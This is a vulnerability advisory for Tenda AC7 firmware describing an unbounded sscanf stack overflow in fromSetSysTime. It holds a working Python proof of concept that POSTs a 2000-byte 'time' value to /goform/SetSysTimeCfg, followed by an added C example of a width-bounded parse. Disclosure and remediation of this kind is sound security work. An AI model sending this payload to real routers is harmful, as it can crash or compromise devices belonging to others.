AC7V1.0 V15.03.06.44
The Tenda AC7V1.0 V15.03.06.44 firmware has a stack-based buffer overflow in the fromSetSysTime function. The function reads the time parameter of a POST request into tmpstr and splits it into the year, month, day, hour, min and sec arrays with sscanf:

sscanf(tmpstr, "%[^-]-%[^-]-%[^ ] %[^:]:%[^:]:%s", year, month, day, hour, min, sec);

None of the conversions in the format string has a maximum field width, and the user fully controls the value of time. A field longer than its destination array is therefore written past the end of that array, which triggers the overflow.

import requests

# Address of the test device
ip = "192.168.84.101"
url = "http://" + ip + "/goform/SetSysTimeCfg"

# Over-long value for the time parameter that fromSetSysTime passes to sscanf
payload = b"a" * 2000
data = {
    'timeType': 'sync',
    'time': payload,
}
response = requests.post(url, data=data)
print(response.text)
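
A bounded form of the sscanf call described above, as an added example that is not part of the original advisory and is not Tenda's code. The 8-byte field size and the names sys_time and parse_time_bounded are assumptions; the advisory does not give the firmware's real buffer sizes.

```c
#include <stdio.h>
#include <string.h>

#define FIELD_LEN 8 /* assumed size; the advisory does not give the firmware's */
_Static_assert(FIELD_LEN == 8, "the %7 widths below must equal FIELD_LEN - 1");

struct sys_time {
    char year[FIELD_LEN], month[FIELD_LEN], day[FIELD_LEN];
    char hour[FIELD_LEN], min[FIELD_LEN], sec[FIELD_LEN];
};

/* Pattern from the advisory, shown only as a comment: no conversion has a
 * width, so each field is copied until its delimiter, whatever its length.
 *   sscanf(tmpstr, "%[^-]-%[^-]-%[^ ] %[^:]:%[^:]:%s", year, ..., sec);
 */

/* Bounded parse: every conversion is capped at FIELD_LEN - 1 characters, and
 * %n records how much input was consumed so trailing bytes are rejected.
 * Returns 0 on success, -1 if the input does not fit the expected layout. */
int parse_time_bounded(const char *tmpstr, struct sys_time *t)
{
    int end = 0;

    if (tmpstr == NULL || t == NULL)
        return -1;
    memset(t, 0, sizeof *t);
    int n = sscanf(tmpstr, "%7[^-]-%7[^-]-%7[^ ] %7[^:]:%7[^:]:%7s%n",
                   t->year, t->month, t->day, t->hour, t->min, t->sec, &end);
    if (n != 6 || tmpstr[end] != '\0')
        return -1; /* over-long field, missing field, or trailing data */
    return 0;
}

int main(void)
{
    /* Constructed inputs: one well-formed, one with an over-long year field. */
    const char *samples[] = { "2024-01-02 03:04:05", "aaaaaaaaaaaa-01-02 03:04:05" };
    struct sys_time t;

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-30s -> %s\n", samples[i],
               parse_time_bounded(samples[i], &t) == 0 ? "accepted" : "rejected");
    return 0;
}
```

With the widths in place, an over-long field stops at the cap, the following literal delimiter fails to match, and the function rejects the input instead of writing past the array.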
